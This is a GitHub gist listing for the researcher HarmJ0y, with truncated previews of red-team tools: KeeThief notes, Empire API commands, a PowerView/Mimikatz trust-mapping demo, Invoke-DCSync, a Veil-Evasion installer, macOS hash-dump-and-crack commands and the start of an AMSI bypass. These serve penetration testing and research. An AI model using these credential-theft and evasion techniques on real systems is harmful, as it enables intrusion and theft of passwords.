Will HarmJ0y

Coding towards chaotic good while living on the decision boundary
@HarmJ0y
HarmJ0y / KeeThief.markdown
Last active March 20, 2020 19:43
KeeThief clarification points

A few clarification points for the "KeeThief – A Case Study in Attacking KeePass Part 2" post:

  1. KeeThief doesn't require local administrator rights, only rights to access the KeePass.exe process space you're targeting.

  2. KeeThief.ps1 is fully self-contained (no dependencies and no files dropped to disk) and PowerShell Version 2 compliant (so it will work on Windows 7+).

  3. Secure desktop doesn't matter/come into play as a keylogger isn't used or needed.

  4. This approach is different from KeeFarce - KeeThief recovers the plaintext master password and other key material from memory instead of calling internal methods to export the database contents.

@HarmJ0y
HarmJ0y / rest.sh
Last active March 20, 2020 20:14
Empire RESTful API usage
# start empire headless with the specified API username and password
./empire --headless --username empireadmin --password 'Password123!'
# log in and get the current server token
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}'
# store the token in a variable
TOKEN=<API_token>
# see listener options
@HarmJ0y
HarmJ0y / 44con_demo.ps1
Created September 17, 2016 21:00
Demo for the 44con "Trusts You Might Have Missed" presentation
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1
# map all reachable domain trusts
Invoke-MapDomainTrust
# enumerate groups with 'foreign' users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName
@HarmJ0y
HarmJ0y / Invoke-DCSync.ps1
Last active February 2, 2021 10:46 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Invoke-ReflectivePEInjection
@HarmJ0y
HarmJ0y / ubuntu_veil_evasion_setup.sh
Last active May 12, 2021 08:33
This short script will install Metasploit as well as Veil-Evasion on Ubuntu
#!/bin/bash
sudo apt-get install git
cd /tmp/
git clone https://github.com/darkoperator/MSF-Installer.git
cd MSF-Installer
sudo ./msf_install.sh -i
source ~/.bashrc
sudo chmod 0666 /usr/local/share/metasploit-framework/log/production.log
@HarmJ0y
HarmJ0y / Find-KeePassconfig.ps1
Created July 4, 2016 20:47
Finds and parses any KeePass.config.xml (2.X) and KeePass.ini (1.X) files.
function Find-KeePassconfig {
<#
.SYNOPSIS
Finds and parses any KeePass.config.xml (2.X) and KeePass.ini (1.X) files.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@HarmJ0y
HarmJ0y / osx_hashdump.py
Created January 12, 2016 04:30
osx_hashdump.py
#!/usr/bin/python
# extracts OSX user hashes and outputs a format crackable with oclHashcat
# adapted from http://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored
# and https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/
#
# automation of approach by @harmj0y
#
# sudo ./osx_hashdump.py
# ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt
@HarmJ0y
HarmJ0y / patchless_amsi.h
Created May 13, 2022 19:14 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@HarmJ0y
HarmJ0y / RC4.ps1
Last active August 30, 2022 15:03
PowerShell RC4 Implementation
function ConvertTo-Rc4ByteStream {
<#
.SYNOPSIS
Converts an input byte array to a RC4 cipher stream using the specified key.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@HarmJ0y
HarmJ0y / Get-NonstandardService.ps1
Created June 7, 2017 01:11
Get-NonstandardService
function Get-NonstandardService {
<#
.SYNOPSIS
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None